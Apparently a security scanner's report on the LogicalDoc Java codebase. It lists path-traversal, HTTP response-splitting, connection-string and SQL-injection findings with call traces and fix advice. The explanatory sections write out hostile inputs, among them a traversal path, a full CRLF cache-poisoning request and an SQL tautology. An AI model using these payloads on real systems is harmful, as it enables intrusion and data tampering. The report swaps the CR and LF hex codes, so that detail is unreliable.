Javapackage com.example.foo.server;import com.google.gwt.user.server.rpc.XsrfProtectedServiceServlet;import com.example.client.MyService;

public class MyServiceImpl extends XsrfProtectedServiceServlet implements MyService {

public String myMethod(String s) { // Do something interesting with 's' here on the server. return s; }}•

On the client side:

•RPC interfaces must inherit from XsrfProtectedService interface:

Javapackage com.example.foo.client;

import com.google.gwt.user.client.rpc.XsrfProtectedService;

public interface MyService extends XsrfProtectedService { public String myMethod(String s);}•

Or be marked with the @XsrfProtect annotation:

Javapackage com.example.foo.client;

import com.google.gwt.user.client.rpc.RemoteService;import com.google.gwt.user.server.rpc.XsrfProtect

@XsrfProtectpublic interface MyService extends RemoteService { public String myMethod(String s);}•

When making a call to the protected service, the client must receive the necessary token and send it to the service. In order to do that, you need to use the HasRpcToken interface:

JavaXsrfTokenServiceAsync xsrf = (XsrfTokenServiceAsync)GWT.create(XsrfTokenService.class);((ServiceDefTarget)xsrf).setServiceEntryPoint(GWT.getModuleBaseURL() + "xsrf");xsrf.getNewXsrfToken(new AsyncCallback<XsrfToken>() { public void onSuccess(XsrfToken token) { MyServiceAsync rpc = (MyServiceAsync)GWT.create(MyService.class); ((HasRpcToken) rpc).setRpcToken(token);

// make XSRF protected RPC call rpc.doStuff(new AsyncCallback<Void>() {


// ... } ); }

public void onFailure(Throwable caught) { try { throw caught; } catch (RpcTokenException e) { // Can be thrown for several reasons: // - duplicate session cookie, which may be a sign of a cookie // overwrite attack // - XSRF token cannot be generated because session cookie isn't // present } catch (Throwable e) { // unexpected } });

Java: File system path manipulationSeverity: highLanguage: JavaShort description: In order to define relative paths in file system, “./” “and “../” characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionPath.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/searchengine/SearchOptions.javaCode:

101 }102103 public static SearchOptions read(File file) throws FileNotFoundException, IOException, ClassNotFoundException {104 SearchOptions searchOptions = null;105 // Deserialize from a file106 ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));107 try {108 // Deserialize the object109 searchOptions = (SearchOptions) in.readObject();110 } finally {111 in.close();

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::load186 File dir = UserUtil.getUserResource(session.getUserId(), "queries");187 File file = new File(dir, name + ".ser");188 SearchOptions opt = null;


https://localhost:443/scanner/article?articleName=/en/Java/InjectionPath.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionPath.html


com.logicaldoc.web.service.SearchServiceImpl::load189 try {190 opt = SearchOptions.read(file);191 } catch (Exception e) {

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/searchengine/SearchOptions.java

com.logicaldoc.core.searchengine.SearchOptions::read105 // Deserialize from a file106 ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));107 try {

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/util/UserUtil.javaCode:

22 * @param id The user identifier23 * @return24 */25 public static File getUserHome(long id) {26 File root = getUsersDir();27 File userDir = new File(root, Long.toString(id));28 if (!userDir.exists()) {29 try {30 FileUtils.forceMkdir(userDir);31 } catch (IOException e) {32 return null;

Attack details:


com.logicaldoc.web.service.SearchServiceImpl::getSearches206 public List<SearchOptions> getSearches(Session session) {207 File file = UserUtil.getUserResource(session.getUserId(), "queries");208 if (!file.exists()) {

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/util/UserUtil.java

com.logicaldoc.core.util.UserUtil::getUserResource47 public static File getUserResource(long id, String path) {48 File root = getUserHome(id);49 File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/util/UserUtil.java

com.logicaldoc.core.util.UserUtil::getUserHome26 File root = getUsersDir();27 File userDir = new File(root, Long.toString(id));28 if (!userDir.exists()) {

File name: logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/Dropbox.javaCode:

150 }151 return false;152 }153154 public boolean uploadFile(File inputFile, String path, boolean overwrite) throws IOException {155 FileInputStream inputStream = new FileInputStream(inputFile);


156 try {157 if (!path.startsWith("/"))158 path = "/" + path;159 DbxWriteMode mode = overwrite ? DbxWriteMode.force() : DbxWriteMode.add();160 DbxEntry.File uploadedFile = client.uploadFile(path, mode, inputFile.length(), inputStream);

Attack details:

logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/DropboxServiceImpl.java

com.logicaldoc.dropbox.DropboxServiceImpl::uploadDocument195 store.writeToFile(docId, store.getResourceName(docId, null, null), temp);196 dropbox.uploadFile(temp, path, true);197

logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/Dropbox.java

com.logicaldoc.dropbox.Dropbox::uploadFile154 public boolean uploadFile(File inputFile, String path, boolean overwrite) throws IOException {155 FileInputStream inputStream = new FileInputStream(inputFile);156 try {

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/csv/CSVFileReader.javaCode:

71 * @throws UnsupportedEncodingException72 */73 public CSVFileReader(String inputFileName, char sep, char qual) throws FileNotFoundException,74 UnsupportedEncodingException {75 super(sep, qual);76 InputStreamReader isr = new InputStreamReader(new FileInputStream(inputFileName), "UTF-8");77 in = new BufferedReader(isr);78 }7980 /**81 * Split the next line of the input CSV file into fields.

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/ContactServiceImpl.java

com.logicaldoc.web.service.ContactServiceImpl::parseContacts124 if (file != null) {125 CSVFileReader reader = new CSVFileReader(file.getAbsolutePath(), separator.charAt(0),126 delimiter.charAt(0));127 if (skipFirstRow)

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/csv/CSVFileReader.java

com.logicaldoc.util.csv.CSVFileReader::Constructor75 super(sep, qual);76 InputStreamReader isr = new InputStreamReader(new FileInputStream(inputFileName), "UTF-8");77 in = new BufferedReader(isr);


File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.javaCode:

263 * 264 * @param pluginName The plugin name265 */266 public static File getPluginHome(String pluginName) {267 File root = getPluginsDir();268 File userDir = new File(root, pluginName);269 if (!userDir.exists()) {270 try {271 FileUtils.forceMkdir(userDir);272 } catch (IOException e) {273 return null;

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/DownloadServlet.java

com.logicaldoc.web.DownloadServlet::doGet66 if (request.getParameter("pluginId") != null)67 ServletUtil.downloadPluginResource(request, response, sid, request.getParameter("pluginId"),68 request.getParameter("resourcePath"), request.getParameter("fileName"));69 else

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java

com.logicaldoc.web.util.ServletUtil::downloadPluginResource109110 File file = PluginRegistry.getPluginResource(pluginName, resourcePath);111

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource308 public static File getPluginResource(String pluginName, String path) {309 File root = getPluginHome(pluginName);310 File resource = new File(root.getPath() + "/" + path);


com.logicaldoc.util.plugin.PluginRegistry::getPluginHome267 File root = getPluginsDir();268 File userDir = new File(root, pluginName);269 if (!userDir.exists()) {

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.javaCode:

305 * @param path The resource path306 * @return307 */308 public static File getPluginResource(String pluginName, String path) {309 File root = getPluginHome(pluginName);310 File resource = new File(root.getPath() + "/" + path);311 if (!resource.exists() && !path.contains("."))312 try {313 FileUtils.forceMkdir(resource);314 } catch (IOException e) {315 return null;

Attack details:



com.logicaldoc.web.DownloadServlet::doGet66 if (request.getParameter("pluginId") != null)67 ServletUtil.downloadPluginResource(request, response, sid, request.getParameter("pluginId"),68 request.getParameter("resourcePath"), request.getParameter("fileName"));69 else








com.logicaldoc.util.plugin.PluginRegistry::getPluginHome275 }276 return userDir;277 }278




com.logicaldoc.util.plugin.PluginRegistry::getPluginResource309 File root = getPluginHome(pluginName);310 File resource = new File(root.getPath() + "/" + path);311 if (!resource.exists() && !path.contains("."))

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.javaCode:

233 Map<String, String> receivedContentTypes = (Map<String, String>) session234 .getAttribute(RECEIVEDCONTENTTYPES);


235236 if (receivedContentTypes != null && receivedContentTypes.containsKey(fieldName))237 response.setContentType(receivedContentTypes.get(fieldName));238 FileInputStream is = new FileInputStream(f);239 copyFromInputStreamToOutputStream(is, response.getOutputStream());240 } else {241 renderXmlResponse(request, response, XML_ERROR_ITEM_NOT_FOUND);242 }243 }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.java

com.logicaldoc.web.UploadServlet::getUploadedFile216217 String fieldName = request.getParameter(UConsts.PARAM_SHOW);218


com.logicaldoc.web.UploadServlet::getUploadedFile227228 if (receivedFiles == null || !receivedFiles.containsKey(fieldName))229 return;


com.logicaldoc.web.UploadServlet::getUploadedFile230231 File f = receivedFiles.get(fieldName);232 if (f != null) {


com.logicaldoc.web.UploadServlet::getUploadedFile237 response.setContentType(receivedContentTypes.get(fieldName));238 FileInputStream is = new FileInputStream(f);239 copyFromInputStreamToOutputStream(is, response.getOutputStream());


138139 try {140 SearchOptions opt = toSearchOptions(options);141142 File file = UserUtil.getUserResource(session.getUserId(), "queries");143 file = new File(file, opt.getName() + ".ser");144 if (file.exists()) {145 return false;146 }147148 try {

Attack details:


com.logicaldoc.web.service.SearchServiceImpl::toSearchOptions291 searchOptions.setMaxHits(options.getMaxHits());


292 searchOptions.setName(options.getName());293 searchOptions.setUserId(options.getUserId());


com.logicaldoc.core.searchengine.SearchOptions::setName131 public void setName(String name) {132 this.name = name;133 }


com.logicaldoc.core.searchengine.SearchOptions::getName127 public String getName() {128 return name;129 }130


com.logicaldoc.web.service.SearchServiceImpl::save142 File file = UserUtil.getUserResource(session.getUserId(), "queries");143 file = new File(file, opt.getName() + ".ser");144 if (file.exists()) {


164165 try {166 File dir = UserUtil.getUserResource(session.getUserId(), "queries");167168 for (String name : names) {169 File file = new File(dir, name + ".ser");170 try {171 FileUtils.forceDelete(file);172 } catch (IOException e) {173 log.error(e.getMessage());174 }

Attack details:


com.logicaldoc.web.service.SearchServiceImpl::delete167168 for (String name : names) {169 File file = new File(dir, name + ".ser");


com.logicaldoc.web.service.SearchServiceImpl::delete168 for (String name : names) {169 File file = new File(dir, name + ".ser");170 try {


182 public GUISearchOptions load(String name) throws ServerException {


183 Session session = ServiceUtil.validateSession(getThreadLocalRequest());184185 try {186 File dir = UserUtil.getUserResource(session.getUserId(), "queries");187 File file = new File(dir, name + ".ser");188 SearchOptions opt = null;189 try {190 opt = SearchOptions.read(file);191 } catch (Exception e) {192 log.error(e.getMessage(), e);


149150 public void makeWorkingDir(File repoFolder) throws IOException {151 repoFolder.mkdirs();152 repoFolder.mkdir();153154 File dbDir = new File(repoFolder, "db");155 FileUtils.forceMkdir(dbDir);156157 // build phisically the working directory158 // and change settings config159 String docDir = FilenameUtils.separatorsToUnix(repoFolder.getPath() + "/docs/");


37 protected static Logger log = LoggerFactory.getLogger(SetupServiceImpl.class);3839 @Override40 public void setup(SetupInfo data) {41 data.setRepositoryFolder(data.getRepositoryFolder().replaceAll("\\\\", "/"));42 File repoFolder = new File(data.getRepositoryFolder());43 log.warn("Initialize system using repository " + repoFolder);44 try {45 makeWorkingDir(repoFolder);46 createDB(data);47 writeRegConfig(data);

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.javaCode:

121122 InputStream is = null;123 OutputStream os = null;124125 try {126 is = new FileInputStream(file);127 os = response.getOutputStream();128129 int letter = 0;130131 byte[] buffer = new byte[128 * 1024];

Attack details:


com.logicaldoc.web.DownloadServlet::doGet66 if (request.getParameter("pluginId") != null)67


ServletUtil.downloadPluginResource(request, response, sid, request.getParameter("pluginId"),68 request.getParameter("resourcePath"), request.getParameter("fileName"));69 else








com.logicaldoc.util.plugin.PluginRegistry::getPluginHome275 }276 return userDir;277 }278




com.logicaldoc.util.plugin.PluginRegistry::getPluginResource309 File root = getPluginHome(pluginName);310 File resource = new File(root.getPath() + "/" + path);311 if (!resource.exists() && !path.contains("."))


com.logicaldoc.util.plugin.PluginRegistry::getPluginResource317318 return resource;319 }320}


com.logicaldoc.web.util.ServletUtil::downloadPluginResource109110 File file = PluginRegistry.getPluginResource(pluginName, resourcePath);


111


com.logicaldoc.web.util.ServletUtil::downloadPluginResource125 try {126 is = new FileInputStream(file);127 os = response.getOutputStream();

File system path manipulation

In order to define relative paths in file system, “./” “and “../” characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.

Example 1

This vulnerability shows up if the both of the following are true:

•The malicious user can enter a path to a file system object that would be accessed;

•After giving the path to the object, the malicious user can perform tasks, previously limited to him. Let’s take a look at an example, where the application receives a file name from and HTTP request, checks for its existence on the server, and returns the file to the user in an HTTP response:

Java@Overrideprotected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String requestedFileName = request.getParameter("file"); File file = new File("/usr/local/fileserver/" + requestedFileName); if (send404IfNotExists(response, file)) return; sendFile(response, file);}

Let’s suppose the HTML page that asks the user to download the file presents a list of available files, thus limiting the user’s access to the files on the server. However, the malicious user can create URL in the browser address bar himself, giving the path to the file he needs. Thus, the user can gain access to server files that are not meant for the public.

Example 2

Let’s take a look at a similar example:

Java@Overrideprotected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String requestedFileName = request.getParameter("file"); File file = new File("C:\\reports\\users\\" + requestedFileName); if (send404IfNotExists(response, file)) return; sendFile(response, file);}

The developer has not anticipated that the malicious user can pass the following as the file name:

Data"..\\..\\dblog.log"


As a result, the program will return the following file:Data"C:\reports\users\..\..\dblog.log"

Which is identical to:

Data"С:\dblog.log"

Instead of getting a log file, the malicious user can read a log of database operations, which contains critical information.

Potential consequences•

The malicious user can gain unsanctioned access to confidential data stored on the file system;

•The malicious user can gain write access to critical files, including config files. For example, he can write in a new user account, and bypass authorization;

•The malicious user can write access to executable files and libraries. He can thus replace a critical application module for his own, gaining complete system access;

•The malicious user can gain erase access to critical files, completely destroying system productivity.

Removal recommendations•

When performing any input filtration on the client side, make sure that similar filtration is done on the server side as well. This is done because the user can modify the data after the client-side filtering is done;

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected. You can, for example, limit file extensions, allowed symbols in the input string or file name length in symbols:

•Before validation filesystem paths, canonize them

•To ensure the validity of file system paths, you can use a list of allowed symbols. For example, add a limitation that the file must contain only ‘.’ symbol, and no ‘/’ symbols. We recommend against relying on blacklists that include potentially dangerous symbols. For example, this includes filters that remove dangerous sequences from the string. If the filter removes ‘../’ from the string, then after filtering the sequence ‘../…//’, the result would be ‘../’, just what the malicious user needs. Using these recommendations, we can rewrite the first example using the validateFilename function:

Java@Overrideprotected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String requestedFileName = request.getParameter("file"); File file = new File("/usr/local/fileserver/" + validateFilename(requestedFileName)); if (send404IfNotExists(response, file)) return; sendFile(response, file);}

Java: Incorrect Newline Symbol Filtration in HTTP-response Headers


Severity: highLanguage: JavaShort description: The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionHttpResponse.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.javaCode:

47 else48 successUrl.append("?");49 successUrl.append("tenant=");50 successUrl.append(session.getTenantName());5152 response.setHeader(PARAM_SUCCESSURL, successUrl.toString());53 response.sendRedirect(successUrl.toString());54 }55 }56}

Attack details:

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.java

com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess33 Authentication authentication) throws IOException, ServletException {34 String param = request.getParameter(PARAM_SUCCESSURL);35 LDAuthenticationToken token = (LDAuthenticationToken) authentication;


com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess40 if (param != null) {41 StringBuffer successUrl = new StringBuffer(param);42 log.info("Authentication of {} was succesful, redirecting to {}", authentication.getName(), successUrl);


com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess5152 response.setHeader(PARAM_SUCCESSURL, successUrl.toString());53 response.sendRedirect(successUrl.toString());

Incorrect Newline Symbol Filtration in HTTP-response Headers

If the application uses external sources for generating HTTP response headers, and the data is not filtered properly, the malicious user can introduce newline symbols into its elements. Since HTTP headers are separated using newline symbols, the malicious user can enter its own headers in the server responses.

https://localhost:443/scanner/article?articleName=/en/Java/InjectionHttpResponse.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionHttpResponse.html


The HTTP standard defines that HTTP headers are split using a CRLF symbol sequence: CR, 0x0A, LF, 0x0D. The body of the response is further split using with a double CRLF sequence.

By adding CRLF to the header of the response, the malicious user can modify the response in a way that a user's browser will treat them as separate responses to one request, with the second one (header and body) being completely controlled by the malicious user.

Example

Let's take a look at a web application that has a public and a private part. In order to access the private part, the user needs to undergo authentication. If an unauthorized user tries to access a closed resource, he will be redirected to the login page, while the address of the original page remains in the URL parameter next. In case of successful authorization, the user is sent to the resource they demanded in the first place, which uses server redirection via the Location header, the target of which is the URL value of the next parameter.

The application is available at http://example.com/, while the application is accessed via a reverse proxy server that performs caching, among other things. Processing authentication requests is done using an application class that contains the functions below.

Note: the user profile is provided by the User class, which is also a part of the application. The id attribute of the User class is the session ID, used during authentication when accessing other resources. The authentication is done by the authenticate() function, which takes "user_login and password" as input and returns either a User() object or null, if the authentication failed. We omit the details of HTML form generation.

Java@Overrideprotected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException{ String url = req.getParameter( "next" ); displayLoginPage(resp, url);} @Overrideprotected void doPost( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException{ String username = req.getParameter( "user" ); String password = req.getParameter( "pass" ); String redirectUrl = req.getParameter( "next" ); User user = authenticate(username, password); if ( user != null ) { resp.setStatus( 303 ); Cookie idCookie = new Cookie( "id", String.valueOf( user.getId() ) ); idCookie.setMaxAge( 3600 ); idCookie.setPath( "/" ); resp.addCookie( idCookie ); resp.setHeader( "Location", redirectUrl ); } else { resp.getWriter().print( "Authentication failed" ); }}

Using the flaw of adding newline symbols to the Location header, the malicious user can perform a Cache Poisoning attack. The malicious user needs to send a request to the server with a no-cache directive:

DataGET / HTTP/1.1Pragma: no-cacheHost: example.com

The Pragma header sends a command to the caching server to delete the page at the "/" address from cache. Afterwards, the malicious user needs to make POST request with additional headers and body. We assume a user name "user1" with a password "pass1" is in the system.


DataPOST / HTTP/1.1Host: example.comContent-Lenght: 222Content-Type: application/x-www-form-urlencoded user=user1&pass=pass1&next=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a Last-Modified:%20Mon,%2027%20Oct%202020%2014:50:18%20GMT%0d%0a Content-Length:%207%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface!

Note: in order to encode the space, CR and LF in the request body, they are encoded in URL encode: CR - %0a, LF - %0d, space - %20.

As a response to this request, the application server sends a redirect using the Location header, with a target being the value of next parameter, after decoding it:

DataHTTP/1.1 303 See OtherContent-Type: text/htmlLocation:Content-Length: 0 HTTP/1.1 200 OKLast-Modified: Mon, 27 Oct 2020 14:50:18 GMTContent-Length: 7Content-Type: text/html deface!

Note that despite the fact that this is a single response to the server, the recipient reads it as two separate responses.

In addition, the second one contains the "Last-Modified: Mon, 27 Oct 2020 14:50:18 GMT" header, which lets the cache server know that the body of the response should go into cache.

Note: the timestamp in Last-Modified needs to be larger than the server time on request. This is necessary for the response to be placed in cache.

The last step of the attack is linking this response to an often-requested part of the server (such as /welcome) by the caching proxy server. In order to do this, the malicious user needs to send a GET request right after the POST request in the same TCP connection. The GET request needs to contain the page he wants to replace in cache. In our case, that's the /welcome page.

Now, in response to all example.com/welcome requests, the caching proxy server will give the responses from cache. Specifically, this will be the /welcome page.


The ability to add HTTP headers, not intended by the developer give the malicious user the opportunity to perform Cache Poisoning attacks, Page Hijacking, or Cross-Site Scripting (XSS) In general, exploiting this vulnerability can compromise other users, up to and including the theft of their confidential information.


When doing client-side user input checking, make sure that similar checks are done on the server side as well, since the malicious user can modify data after passing the client-side checks. Also, make sure that both server and client side checks use the same encoding;

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the


"accept known good" method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected. If the input data is a URL, check that it is a valid URL;

•If the user data is used to generate header names or values, ensure that all special HTTP symbols that could be used by the malicious user to change the values of the HTTP response are screened according to URL Encode rules. Using this approach, the doPost() function from the example can be rewritten as such:

Java@Overrideprotected void doPost( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException{ String username = req.getParameter( "user" ); String password = req.getParameter( "pass" ); String redirectUrl = req.getParameter( "next" ); User user = authenticate(username, password); if ( user != null ) { resp.setStatus( 303 ); Cookie idCookie = new Cookie( "id", String.valueOf( user.getId() ) ); idCookie.setMaxAge( 3600 ); idCookie.setPath( "/" ); resp.addCookie( idCookie ); resp.setHeader( "Location", URLEncoder.encode( redirectUrl, "UTF-8" ) ); } else { resp.getWriter().print( "Authentication failed" ); }}

Java: Incorrect user data filtration when forming a connection string to the data sourceSeverity: highLanguage: JavaShort description: When generating a connection string to the data source, using external data without proper filtering can lead to the malicious user manipulating database connection parameters.Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionConnectionString.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.javaCode:

130 }131132 protected void doConnection() {133 try {134 Class.forName(driver);135 con = DriverManager.getConnection(url, username, password);136 con.setAutoCommit(true);137 } catch (Exception ex) {138 log.error(ex.getMessage(), ex);139 }140 }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java

com.logicaldoc.web.service.SetupServiceImpl::createDB227 init.setDriver(info.getDbDriver());

https://localhost:443/scanner/article?articleName=/en/Java/InjectionConnectionString.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionConnectionString.html


228 init.setUrl(info.getDbUrl());229 init.setUsername(info.getDbUsername());

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.java

com.logicaldoc.util.dbinit.DBInit::setUrl184 public void setUrl(String url) {185 this.url = url;186 }


com.logicaldoc.util.dbinit.DBInit::doConnection134 Class.forName(driver);135 con = DriverManager.getConnection(url, username, password);136 con.setAutoCommit(true);

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/dbinit/DBInit.javaCode:

165 public boolean testConnection() {166 boolean result = false;167168 try {169 Class.forName(driver);170 con = DriverManager.getConnection(url, username, password);171 result = true;172 con.close();173 } catch (Exception ex) {174 log.error(ex.getMessage(), ex);175 }

Attack details:


com.logicaldoc.web.service.SetupServiceImpl::createDB227 init.setDriver(info.getDbDriver());228 init.setUrl(info.getDbUrl());229 init.setUsername(info.getDbUsername());


com.logicaldoc.util.dbinit.DBInit::setUrl184 public void setUrl(String url) {185 this.url = url;186 }


com.logicaldoc.util.dbinit.DBInit::testConnection169 Class.forName(driver);170 con = DriverManager.getConnection(url, username, password);171 result = true;

Incorrect user data filtration when forming a connection string to the data source


When generating a connection string to the data source, using external data without proper filtering can lead to the malicious user manipulating database connection parameters.

Example

Let’s take a look at an application that gives the user an interface to some database. Suppose the application uses DBMS authentication and authorization mechanisms. Therefore, the application receives user account details and passes them to the DBMS server, which then authorizes the user for certain actions according to server policies. In order to send the authorization request, the application has to form a connection string. Let’s now take a look at a code fragment that does precisely that:

Javapublic Connection getConnection(String user, String password) throws SQLException { Connection conn = null; conn = DriverManager.getConnection( "jdbc:sqlserver://;servername=server_name; "+ "integratedSecurity=false;" + "user=" + user + "; " + "password =" + password + ";" ); System.out.println("Connected to database"); return conn;}

If the values of user and password variables to do not undergo a filtration check for escape characters, the malicious user can pass the following string as a password:

Datapwd; integratedSecurity = true;

Then the value of integratedSecurity will be set to true. Therefore, the DBMS will use OS or webserver account data to authorize this user. This gives the malicious user DB administration rights, regardless of the server policies.

Potential consequences

Depending on the DBMS used, this vulnerability can have a variety of consequences. For example, with MS SQL Server:

•The malicious user can gain DB administrator privileges, which compromises the database;

•By varying the value of the port parameter of the connection string, the malicious user can scan the DB server ports, which are usually the application ports;

•By changing the serverName parameter to a previously prepared server, as well as the parameter of integratedSecurity, the malicious user can get the hash of the application server user accounts.

Removal recommendations

We need to assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected.

Java: Incorrect user input filtration during SQL request generationsSeverity: highLanguage: JavaShort description: If the application uses external data when generating SQL requests, and that data is not filtered, or is filtered improperly, the malicious user can manipulate the requests.


Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionSql.html


83 * @param sql The SQL to execute84 */85 public void executeSql(String sql) {86 try {87 doConnection();88 PreparedStatement st = con.prepareStatement(sql);89 st.execute();90 st.close();91 } catch (Throwable e) {92 log.error(e.getMessage(), e);93 log.error("Failed to execute " + sql, e);

Attack details:


com.logicaldoc.web.service.SetupServiceImpl::createDB206 && !info.getDbEngine().toLowerCase().contains("hsqldb")) {207 String dbName = info.getDbUrl().substring(info.getDbUrl().lastIndexOf('/') + 1);208 String adminjdbcUrl = info.getDbUrl().substring(0, info.getDbUrl().lastIndexOf('/'));


com.logicaldoc.web.service.SetupServiceImpl::createDB218 if (init.testConnection())219 init.executeSql("create database " + dbName);220 } catch (Throwable t) {


com.logicaldoc.util.dbinit.DBInit::executeSql87 doConnection();88 PreparedStatement st = con.prepareStatement(sql);89 st.execute();

Incorrect user input filtration during SQL request generations

If the application uses external data when generating SQL requests, and that data is not filtered, or is filtered improperly, the malicious user can manipulate the requests.

As a result, the malicious user has read access to the database. If the system is compromised enough, the user might even get write/delete access to the information in the DBMS. Many DBMS also support file system operations, network operations, and OS commands, which gives the malicious user access to those as well, with careful SQL request crafting.

Example 1

Let’s take a look at a servlet code fragment that is responsible for searching the database for several positions, based on type. This selection is limited to positions that the currently authorized user has access to.

Java

https://localhost:443/scanner/article?articleName=/en/Java/InjectionSql.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionSql.html


public class GetItemsServlet extends HttpServlet { public void doPost(HttpServletRequest request, HttpServletResponse response) { ... Connection con = getSqlConnection(); Statement stmt = null; String query = "SELECT * FROM items WHERE " + "user = \”" + request.getParameter(“user”) + " AND " + "itemtype =" + request.getParameter(“itemtype”) +";"; try { stmt = con.createStatement(); ResultSet rs = stmt.executeQuery(query); while (rs.next()) { // result process and listing } } catch (SQLException e ) { printSQLException(e); } finally { if (stmt != null) { stmt.close(); } } }}

After the input parameters are processed, the following SQL query will be generated:

SqlSELECT * FROM itemsWHERE user = <userName>AND itemtype = <itemType>;

However, since the query itself is generated from the user input, as well as program code, this query will be correct only if the user entered the right data. The malicious user can pass the following values to the program:

DatauserNameField: “SomeUserName”itemTypeField: “name OR ‘a’=’a’”

Then the query will look like this:

SqlSELECT * FROM itemsWHERE user = SomeUserNameAND itemType = name OR ‘a’=’a’;

Since the expression ‘a’=’a’ is always true, the entire expression in the WHERE clause is always true. Therefore, the generated query is functionally identical to:

SqlSELECT * FROM items;

In other words, the malicious user now has access to all positions, without being limited by user access.

Example 2

The Spring framework contains the jdbcTemplate class, that deals with SQL queries. This class contains several methods that create SQL queries that take different argument types and return different types of objects. We can rewrite the above example using this class:

Note: the getDataSource function is not standard. It creates the connection to the database and returns an object of the DataSource type.

Javapublic class GetItemsServlet extends HttpServlet { public void doPost(HttpServletRequest request, HttpServletResponse response) { ...


jdbcTemplate = new JdbcTemplate(getDataSource()); String query = "SELECT * FROM items WHERE " + "user = \”" + request.getParameter(“user”) + " AND " + "itemtype =" + request.getParameter(“itemtype”) +";"; try { List rs = jdbcTemplate.queryForList(query); while (rs.next()) { // processing objects and listing } } catch (DataAccessException e ) { printSQLException(e); } }}Example 3

The Hibernate framework is designed specifically for establishing a connection between the application and the DBMS. Hibernate automates SQL query generation, and frees up the developer from having to process the data result sets and to transform objects manually. However, if the developer is using the given API incorrectly, the application can be vulnerable to SQL injection attacks [4]. For example:

JavaString table = request.getParameter("table");String item = request.getParameter("item");

Session session = sessionFactory.getCurrentSession();try{ session.beginTransaction(); SQLQuery query = session.createSQLQuery("SELECT * FROM " + table + "WHERE stuff= ?"); query.setParameter(0, item); session.getTransaction().commit();} catch (Exception e) {}session.close();

In this case, the SQL query is generated using a prepared query. However, the injection can still happen through the table parameter.


The possibility of injecting SQL operators can lead to read/write/delete access to confidential information, stored in the database.

Many DBMS have support for file system operations, network operations, as well as OS commands. An SQL injection can grant the malicious user access to these operations.


We recommend against using dynamic SQL queries. Instead, we recommend using special object mechanisms that automatically generate secure queries;

